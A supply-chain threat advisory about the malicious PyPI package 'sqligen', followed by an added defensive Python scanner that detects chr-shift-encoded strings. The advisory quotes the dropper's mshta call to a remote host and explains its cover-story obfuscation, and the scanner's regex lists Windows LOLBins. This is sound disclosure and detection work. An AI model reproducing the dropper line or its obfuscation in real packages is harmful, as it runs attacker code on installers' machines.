Supply-chain threat intelligence

Incident detail

critical · pypi · obfuscation · osv

Malicious code in sqligen (PyPI)

sqligen

Risk score

92

AI summary

Indexed incident for sqligen (pypi).

Description

setup.py contains an obfuscated install-time dropper that fires on Windows. Two functions with diagnostic-sounding names ('GetDefaultSystemPolicy' / 'CalculateNodeDrift', backed by integer arrays presented as 'InterruptThresholds' and 'ThreadPingLatencies') decode via chr(value+14) arithmetic to the strings 'mshta' and 'https://fixars.top'. On Windows, GetGitCommitHash() runs subprocess.check_output(['mshta', 'https://fixars.top'], shell=True), executing an arbitrary remote HTA payload from fixars.top. This code path is reached from CustomInstallCommand, CustomBuildPyCommand, and CustomDevelopCommand, so any pip install sqligen (or pip install -e .) on a Windows host triggers remote code execution under the installing user's account. The obfuscation (cover-story variable names, chr-shift encoding of the command and URL) demonstrates intentional evasion of source review; legitimate build tooling does not encode 'mshta' as 'hardware interrupt latency thresholds'. The fetched payload is attacker-controlled and unrelated to the package's stated SQL-generation purpose.
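A static check for the decoding pattern described above, added here as an example (it is not ThreatPkg tooling and not code from the package): it parses a setup.py with Python's ast module, collects every integer-array assignment and every constant offset used inside a chr(...) call, decodes each array with each offset, and flags decoded strings that look like a Windows LOLBin name or a URL. The sample setup.py fragment is constructed to mimic the advisory's cover-story arrays and chr(value+14) shift; it only decodes strings and executes nothing.

```python
import ast
import re

# Constructed sample mimicking the advisory's pattern: cover-story integer arrays
# decoded with chr(value + 14). It only decodes strings; nothing is executed.
SAMPLE_SETUP_PY = """
InterruptThresholds = [95, 101, 90, 102, 83]
ThreadPingLatencies = [90, 102, 102, 98, 101, 44, 33, 33]
def GetDefaultSystemPolicy():
    return ''.join(chr(v + 14) for v in InterruptThresholds)
def CalculateNodeDrift():
    return ''.join(chr(v + 14) for v in ThreadPingLatencies)
"""

# Decoded strings worth a human look: Windows LOLBins and URL schemes.
SUSPICIOUS = re.compile(r"mshta|powershell|cmd\.exe|rundll32|https?://", re.IGNORECASE)

def _int_lists(tree):
    """Map variable name -> ints for every `NAME = [int, int, ...]` assignment."""
    found = {}
    for node in ast.walk(tree):
        if (isinstance(node, ast.Assign) and isinstance(node.value, (ast.List, ast.Tuple))
                and node.value.elts and isinstance(node.targets[0], ast.Name)
                and all(isinstance(e, ast.Constant) and type(e.value) is int for e in node.value.elts)):
            found[node.targets[0].id] = [e.value for e in node.value.elts]
    return found

def _chr_shifts(tree):
    """Collect the constant k from every chr(<expr> + k) or chr(<expr> - k) call."""
    shifts = set()
    for node in ast.walk(tree):
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name) and node.func.id == "chr"
                and len(node.args) == 1 and isinstance(node.args[0], ast.BinOp)
                and isinstance(node.args[0].op, (ast.Add, ast.Sub))
                and isinstance(node.args[0].right, ast.Constant) and type(node.args[0].right.value) is int):
            k = node.args[0].right.value
            shifts.add(k if isinstance(node.args[0].op, ast.Add) else -k)
    return shifts

def scan_setup_py(source):
    """Decode every integer array with every chr-shift seen in the file; return flagged hits."""
    tree = ast.parse(source)
    findings = []
    for name, values in _int_lists(tree).items():
        for shift in sorted(_chr_shifts(tree)):
            if all(0 <= v + shift < 0x110000 for v in values):  # stay inside valid code points
                decoded = "".join(chr(v + shift) for v in values)
                if decoded.isprintable() and SUSPICIOUS.search(decoded):
                    findings.append((name, shift, decoded))
    return findings
```

Because the shift is harvested from any chr() call and applied to every integer array in the file, an array that is decoded elsewhere (or never decoded inline) is still checked; a benign setup.py with plain integer lists and no chr arithmetic produces no findings.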

During installation, the code attempts to download and start a malicious executable.

Likely related to 2025-08-raknet-testing-package.


Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-easyaillm

Reasons (based on the campaign):

  • Downloads and executes a remote executable.

  • obfuscation

  • malware

  • tool:mshta

Technical details

Affected versions

  • =1.0.0
  • =1.0.5
  • =1.0.6
  • =1.0.7
  • =1.0.8
  • =1.1.1
  • =1.1.3
  • =1.1.4
  • >=0

Indicators

  • affected version =1.0.0 (75%)
  • affected version =1.0.5 (75%)
  • affected version =1.0.6 (75%)
  • affected version =1.0.7 (75%)
  • affected version =1.0.8 (75%)
  • affected version =1.1.1 (75%)
  • affected version =1.1.3 (75%)
  • affected version =1.1.4 (75%)
  • affected version >=0 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents